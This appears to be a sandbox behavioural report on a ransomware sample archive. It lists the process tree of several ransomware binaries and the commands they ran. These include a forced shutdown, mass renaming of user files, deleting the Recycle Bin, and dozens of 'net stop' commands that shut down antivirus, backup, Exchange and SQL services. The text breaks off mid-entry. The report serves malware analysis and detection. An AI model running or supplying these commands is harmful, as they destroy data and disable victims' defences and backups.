"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00398.7z"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:552

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1552
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /1
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:4540

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1468
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2244
- - C:\Users\Admin\Desktop\00398\HEUR-Trojan-Ransom.MSIL.Blocker.gen-5bc1aa76792901dce26683075941887a08bd4bafae6ad99edae15368aff2b598.exe
    HEUR-Trojan-Ransom.MSIL.Blocker.gen-5bc1aa76792901dce26683075941887a08bd4bafae6ad99edae15368aff2b598.exe
    3⤵
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Loads dropped DLL
    PID:4308
- - C:\Users\Admin\Desktop\00398\HEUR-Trojan-Ransom.MSIL.Encoder.gen-39d4d4591d7dc4242d23460417568b7da1b6efd62e9dcd3b409a3922dad37b78.exe
    HEUR-Trojan-Ransom.MSIL.Encoder.gen-39d4d4591d7dc4242d23460417568b7da1b6efd62e9dcd3b409a3922dad37b78.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3580
  - - C:\Windows\SysWOW64\shutdown.exe
      "C:\Windows\System32\shutdown.exe" -s /t 3
      4⤵
      PID:16268
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C ren C:\Users\%USERNAME%\Desktop\*.* *.%random%
      4⤵
      PID:18584
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C ren C:\Users\%USERNAME%\Downloads\*.* *.%random%
      4⤵
      PID:19236
- - C:\Users\Admin\Desktop\00398\HEUR-Trojan-Ransom.MSIL.Foreign.gen-4075ae09b2cad5580286fb104acdbc0bfff1168e1f49057049807af7ec11957e.exe
    HEUR-Trojan-Ransom.MSIL.Foreign.gen-4075ae09b2cad5580286fb104acdbc0bfff1168e1f49057049807af7ec11957e.exe
    3⤵
    - Executes dropped EXE
    PID:2912
  - - C:\ProgramData\Dhonvdh\ithmrdrvas.exe
      "C:\ProgramData\Dhonvdh\ithmrdrvas.exe"
      4⤵
      PID:19300
- - C:\Users\Admin\Desktop\00398\HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe
    HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4884
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
      4⤵
      PID:1876
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop avpsus /y
      4⤵
      PID:4312
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop avpsus /y
        5⤵
        
        PID:12048
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop McAfeeDLPAgentService /y
      4⤵
      PID:4952
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
        5⤵
        
        PID:12316
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop mfewc /y
      4⤵
      PID:4172
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop mfewc /y
        5⤵
        
        PID:13448
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop BMR Boot Service /y
      4⤵
      PID:3356
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop BMR Boot Service /y
        5⤵
        
        PID:15584
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop NetBackup BMR MTFTP Service /y
      4⤵
      PID:4608
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
        5⤵
        
        PID:12308
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop DefWatch /y
      4⤵
      PID:3144
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop DefWatch /y
        5⤵
        
        PID:15564
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop ccEvtMgr /y
      4⤵
      PID:1464
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop ccEvtMgr /y
        5⤵
        
        PID:13440
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop ccSetMgr /y
      4⤵
      PID:2856
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop ccSetMgr /y
        5⤵
        
        PID:13456
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop SavRoam /y
      4⤵
      PID:5092
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SavRoam /y
        5⤵
        
        PID:13432
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop RTVscan /y
      4⤵
      PID:4336
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop RTVscan /y
        5⤵
        
        PID:14528
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop QBFCService /y
      4⤵
      PID:4776
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop QBFCService /y
        5⤵
        
        PID:16376
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop QBIDPService /y
      4⤵
      PID:3812
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop QBIDPService /y
        5⤵
        
        PID:15820
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop Intuit.QuickBooks.FCS /y
      4⤵
      PID:4748
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
        5⤵
        
        PID:15972
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop QBCFMonitorService /y
      4⤵
      PID:1732
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop QBCFMonitorService /y
        5⤵
        
        PID:15444
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop YooBackup /y
      4⤵
      PID:4552
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop YooBackup /y
        5⤵
        
        PID:14892
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop YooIT /y
      4⤵
      PID:4680
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop YooIT /y
        5⤵
        
        PID:14868
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop zhudongfangyu /y
      4⤵
      PID:4168
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop zhudongfangyu /y
        5⤵
        
        PID:16956
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop stc_raw_agent /y
      4⤵
      PID:4756
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop stc_raw_agent /y
        5⤵
        
        PID:15500
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop VSNAPVSS /y
      4⤵
      PID:4224
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VSNAPVSS /y
        5⤵
        
        PID:15140
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop VeeamTransportSvc /y
      4⤵
      PID:4556
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamTransportSvc /y
        5⤵
        
        PID:13416
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop VeeamDeploymentService /y
      4⤵
      PID:5032
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamDeploymentService /y
        5⤵
        
        PID:13408
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop VeeamNFSSvc /y
      4⤵
      PID:4784
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamNFSSvc /y
        5⤵
        
        PID:15880
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop veeam /y
      4⤵
      PID:4940
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop veeam /y
        5⤵
        
        PID:14748
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop PDVFSService /y
      4⤵
      PID:4732
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop PDVFSService /y
        5⤵
        
        PID:16276
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop BackupExecVSSProvider /y
      4⤵
      PID:2900
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop BackupExecVSSProvider /y
        5⤵
        
        PID:15484
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop BackupExecAgentAccelerator /y
      4⤵
      PID:1752
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
        5⤵
        
        PID:16716
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop BackupExecAgentBrowser /y
      4⤵
      PID:3948
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
        5⤵
        
        PID:15268
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop BackupExecDiveciMediaService /y
      4⤵
      PID:3204
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
        5⤵
        
        PID:14948
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop BackupExecManagementService /y
      4⤵
      PID:2496
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop BackupExecManagementService /y
        5⤵
        
        PID:15540
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop BackupExecRPCService /y
      4⤵
      PID:3724
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop BackupExecRPCService /y
        5⤵
        
        PID:16160
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop AcrSch2Svc /y
      4⤵
      PID:3536
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop AcrSch2Svc /y
        5⤵
        
        PID:15724
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop AcronisAgent /y
      4⤵
      PID:3940
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop AcronisAgent /y
        5⤵
        
        PID:15828
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop CASAD2DWebSvc /y
      4⤵
      PID:4452
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop CASAD2DWebSvc /y
        5⤵
        
        PID:15028
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop CAARCUpdateSvc /y
      4⤵
      PID:3988
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop CAARCUpdateSvc /y
        5⤵
        
        PID:14860
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop sophos /y
      4⤵
      PID:4564
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop sophos /y
        5⤵
        
        PID:14808
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop “Acronis VSS Provider” /y
      4⤵
      PID:4896
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop “Acronis VSS Provider” /y
        5⤵
        
        PID:14824
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop MsDtsServer /y
      4⤵
      PID:4080
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MsDtsServer /y
        5⤵
        
        PID:15004
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop IISAdmin /y
      4⤵
      PID:212
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop IISAdmin /y
        5⤵
        
        PID:13424
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop MSExchangeES /y
      4⤵
      PID:3556
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeES /y
        5⤵
        
        PID:13952
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop “Sophos Agent” /y
      4⤵
      PID:2356
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop “Sophos Agent” /y
        5⤵
        
        PID:14464
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop EraserSvc11710 /y
      4⤵
      PID:3476
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop EraserSvc11710 /y
        5⤵
        
        PID:15756
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop “Enterprise Client Service” /y
      4⤵
      PID:4580
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop “Enterprise Client Service” /y
        5⤵
        
        PID:14816
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop “SQL Backups /y
      4⤵
      PID:5060
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop “SQL Backups /y
        5⤵
        
        PID:15020
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop MsDtsServer100 /y
      4⤵
      PID:1092
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MsDtsServer100 /y
        5⤵
        
        PID:15284
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop NetMsmqActivator /y
      4⤵
      PID:2848
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop NetMsmqActivator /y
        5⤵
        
        PID:16424
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop MSExchangeIS /y
      4⤵
      PID:2820
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeIS /y
        5⤵
        
        PID:16136
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop “Sophos AutoUpdate Service” /y
      4⤵
      PID:4048
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y
        5⤵
        
        PID:14996
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop SamSs /y
      4⤵
      PID:936
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SamSs /y
        5⤵
        
        PID:14908
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop ReportServer /y
      4⤵
      PID:1520
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop ReportServer /y
        5⤵
        
        PID:13964
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop “SQLsafe Backup Service” /y
      4⤵
      PID:5124
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop “SQLsafe Backup Service” /y
        5⤵
        
        PID:16036
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop MsDtsServer110 /y
      4⤵
      PID:5140
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MsDtsServer110 /y
        5⤵
        
        PID:16896
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop POP3Svc /y
      4⤵
      PID:5148
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop POP3Svc /y
        5⤵
        
        PID:15508
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop MSExchangeMGMT /y
      4⤵
      PID:5164
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeMGMT /y
        5⤵
        
        PID:15356
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop “Sophos Clean Service” /y
      4⤵
      PID:5172
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop “Sophos Clean Service” /y
        5⤵
        
        PID:14776
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop SMTPSvc /y
      4⤵
      PID:5188
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SMTPSvc /y
        5⤵
        
        PID:14844
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop “SQLsafe Filter Service” /y
      4⤵
      PID:5196
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop “SQLsafe Filter Service” /y
        5⤵
        
        PID:15156
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop msftesql$PROD /y
      4⤵
      PID:5204
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop msftesql$PROD /y
        5⤵
        
        PID:15332
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop SstpSvc /y
      4⤵
      PID:5212
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SstpSvc /y
        5⤵
        
        PID:13912
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop MSExchangeMTA /y
      4⤵
      PID:5220
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeMTA /y
        5⤵
        
        PID:16888
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop “Sophos Device Control Service” /y
      4⤵
      PID:5228
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop “Sophos Device Control Service” /y
        5⤵
        
        PID:17164
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop ReportServer$SYSTEM_BGC /y
      4⤵
      PID:5236
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
        5⤵
        
        PID:16700
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop “Symantec System Recovery” /y
      4⤵
      PID:5244
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop “Symantec System Recovery” /y
        5⤵
        
        PID:16004
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop MSOLAP$SQL_2008 /y
      4⤵
      PID:5252
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
        5⤵
        
        PID:15624
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop UI0Detect /y
      4⤵
      PID:5260
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop UI0Detect /y
        5⤵
        
        PID:1508
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop MSExchangeSA /y
      4⤵
      PID:5268
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeSA /y
        5⤵
        
        PID:8
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop “Sophos File Scanner Service” /y
      4⤵
      PID:5276
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop “Sophos File Scanner Service” /y
        5⤵
        
        PID:15856
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop ReportServer$TPS /y
      4⤵
      PID:5284
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop ReportServer$TPS /y
        5⤵
        
        PID:16336
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop “Veeam Backup Catalog Data Service” /y
      4⤵
      PID:5292
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y
        5⤵
        
        PID:15748
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop MSOLAP$SYSTEM_BGC /y
      4⤵
      PID:5300
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
        5⤵
        
        PID:14496
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop W3Svc /y
      4⤵
      PID:5308
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop W3Svc /y
        5⤵
        
        PID:15716
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop MSExchangeSRS /y
      4⤵
      PID:5316
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeSRS /y
        5⤵
        
        PID:16972
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop “Sophos Health Service” /y
      4⤵
      PID:5324
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop “Sophos Health Service” /y
        5⤵
        
        PID:15732
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop ReportServer$TPSAMA /y
      4⤵
      PID:5332
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
        5⤵
        
        PID:16012
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop “Zoolz 2 Service” /y
      4⤵
      PID:5340
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop “Zoolz 2 Service” /y
        5⤵
        
        PID:14836
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop MSOLAP$TPS /y
      4⤵
      PID:5348
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSOLAP$TPS /y
        5⤵
        
        PID:13208
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop “aphidmonitorservice” /y
      4⤵
      PID:5356
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop “aphidmonitorservice” /y
        5⤵
        
        PID:15516
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop msexchangeadtopology /y
      4⤵
      PID:5364
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop msexchangeadtopology /y
        5⤵
        
        PID:15404
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop “Sophos MCS Agent” /y
      4⤵
      PID:5372
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop “Sophos MCS Agent” /y
        5⤵
        
        PID:15708
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop AcrSch2Svc /y
      4⤵
      PID:5380
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop AcrSch2Svc /y
        5⤵
        
        PID:13936
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop MSOLAP$TPSAMA /y
      4⤵
      PID:5388
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
        5⤵
        
        PID:15700
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop “intel(r) proset monitoring service” /y
      4⤵
      PID:5396
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y
        5⤵
        
        PID:15668
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop msexchangeimap4 /y
      4⤵
      PID:5404
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop msexchangeimap4 /y
        5⤵
        
        PID:16456
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop “Sophos MCS Client” /y
      4⤵
      PID:5412
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop “Sophos MCS Client” /y
        5⤵
        
        PID:15632
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop ARSM /y
      4⤵
      PID:5420
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop ARSM /y
        5⤵
        
        PID:16880
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop MSSQL$BKUPEXEC /y
      4⤵
      PID:5428
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
        5⤵
        
        PID:16640
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop unistoresvc_1af40a /y
      4⤵
      PID:5436
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop unistoresvc_1af40a /y
        5⤵
        
        PID:14432
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop “Sophos Message Router” /y
      4⤵
      PID:5444
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop “Sophos Message Router” /y
        5⤵
        
        PID:15532
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop BackupExecAgentAccelerator /y
      4⤵
      PID:5452
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
        5⤵
        
        PID:14520
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop MSSQL$ECWDB2 /y
      4⤵
      PID:5460
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
        5⤵
        
        PID:16448
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop audioendpointbuilder /y
      4⤵
      PID:5468
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop audioendpointbuilder /y
        5⤵
        
        PID:16344
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop “Sophos Safestore Service” /y
      4⤵
      PID:5476
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop “Sophos Safestore Service” /y
        5⤵
        
        PID:15764
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop BackupExecAgentBrowser /y
      4⤵
      PID:5484
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
        5⤵
        
        PID:14980
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop MSSQL$PRACTICEMGT /y
      4⤵
      PID:5492
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
        5⤵
        
        PID:3708
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop “Sophos System Protection Service” /y
      4⤵
      PID:5500
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop “Sophos System Protection Service” /y
        5⤵
        
        PID:14964
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop BackupExecDeviceMediaService /y
      4⤵
      PID:5508
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
        5⤵
        
        PID:15772
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop MSSQL$PRACTTICEBGC /y
      4⤵
      PID:5516
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
        5⤵
        
        PID:14480
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop “Sophos Web Control Service” /y
      4⤵
      PID:5524
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop “Sophos Web Control Service” /y
        5⤵
        
        PID:14884
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop BackupExecJobEngine /y
      4⤵
      PID:5532
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop BackupExecJobEngine /y
        5⤵
        
        PID:15452
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop MSSQL$PROD /y
      4⤵
      PID:5540
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$PROD /y
        5⤵
        
        PID:15176
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop AcronisAgent /y
      4⤵
      PID:5548
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop AcronisAgent /y
        5⤵
        
        PID:15780
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop BackupExecManagementService /y
      4⤵
      PID:5556
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop BackupExecManagementService /y
        5⤵
        
        PID:14988
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop MSSQL$PROFXENGAGEMENT /y
      4⤵
      PID:5564
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
        5⤵
        
        PID:14968
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop Antivirus /y
      4⤵
      PID:5572
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop Antivirus /y
        5⤵
        
        PID:15108
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop BackupExecRPCService /y
      4⤵
      PID:5580
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop BackupExecRPCService /y
        5⤵
        
        PID:4772
  - - C:\Windows\SysWOW64\net.exe
